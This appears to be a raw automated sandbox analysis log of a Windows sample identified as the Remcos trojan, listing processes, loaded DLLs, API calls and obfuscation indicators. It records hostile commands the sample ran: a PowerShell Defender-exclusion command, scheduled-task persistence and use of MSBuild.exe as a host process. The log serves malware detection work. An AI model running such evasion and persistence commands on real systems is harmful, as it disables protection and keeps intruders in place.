              Source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: DcBNSgyxoJFip.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.file.exe.7da0000.5.raw.unpack, BxloEJ2ukLoPetmOQZ.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.file.exe.7da0000.5.raw.unpack, BxloEJ2ukLoPetmOQZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.7da0000.5.raw.unpack, BxloEJ2ukLoPetmOQZ.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, ilyiiFeo9pEQDT6PeR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4afc538.2.raw.unpack, ilyiiFeo9pEQDT6PeR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4afc538.2.raw.unpack, BxloEJ2ukLoPetmOQZ.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.file.exe.4afc538.2.raw.unpack, BxloEJ2ukLoPetmOQZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4afc538.2.raw.unpack, BxloEJ2ukLoPetmOQZ.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.file.exe.7da0000.5.raw.unpack, ilyiiFeo9pEQDT6PeR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, BxloEJ2ukLoPetmOQZ.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, BxloEJ2ukLoPetmOQZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, BxloEJ2ukLoPetmOQZ.csSecurity API names: _0020.AddAccessRule
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@16/11@0/1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A63F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-T6WK9E
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_03
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1B5F.tmpJump to behavior
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 39%
              Source: file.exeString found in binary or memory: PageCount-Start date is missing.MHistory is not available before '{0}'.
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: file.exeStatic file information: File size 1075712 > 1048576
              Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x103600
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: 0.2.file.exe.4afc538.2.raw.unpack, BxloEJ2ukLoPetmOQZ.cs.Net Code: mE77pT8gqx System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.3f15b78.0.raw.unpack, MainForm.cs.Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.7da0000.5.raw.unpack, BxloEJ2ukLoPetmOQZ.cs.Net Code: mE77pT8gqx System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, BxloEJ2ukLoPetmOQZ.cs.Net Code: mE77pT8gqx System.Reflection.Assembly.Load(byte[])
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0140E9B8 pushfd ; retf 0_2_0140E9B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0140F550 pushad ; iretd 0_2_0140F559
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0140DBE4 pushfd ; ret 0_2_0140DBED
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0546E4F0 push B402E9DBh; ret 0_2_0546E4F5
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_015BE9B8 pushfd ; retf 9_2_015BE9B9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004567E0 push eax; ret 12_2_004567FE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00455EAF push ecx; ret 12_2_00455EC2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00433FF6 push ecx; ret 12_2_00434009
              Source: file.exeStatic PE information: section name: .text entropy: 7.759878429446134
              Source: DcBNSgyxoJFip.exe.0.drStatic PE information: section name: .text entropy: 7.759878429446134
              Source: 0.2.file.exe.4afc538.2.raw.unpack, I1tqhMsitN66Pt9vOL.csHigh entropy of concatenated method names: 'Dispose', 'TW0v5L4yTT', 'Vftad1hEr6', 'z8Ujmv4Q0c', 'G6MvoWJZSY', 'opWvzHKdJt', 'ProcessDialogKey', 'YveauYSqfG', 'djlavfxJj6', 'NDlaa69xFA'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, pPBPfxvJqfrSovQWaVx.csHigh entropy of concatenated method names: 'lfccokR6Ln', 'AcKczE3wn1', 'JmhSuH4up9', 'SUmt53hE53WSdqZAZ4b', 'B6Yud51bqcSuUKx3Ek6', 'BmTOQ51zrOVFOAroM8o', 'ijATOjhDhfpJlFnytyw', 'H92O1OhXITdcCp18io2'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, L9xFARoPmTUYlrdcmh.csHigh entropy of concatenated method names: 'lQMBPFiKy6', 'VegBxMpp7B', 'MDvBCnuMVE', 'vA2BFbn8qt', 'vGcBMbDo1I', 'a7xB2HyjBi', 'Next', 'Next', 'Next', 'NextBytes'
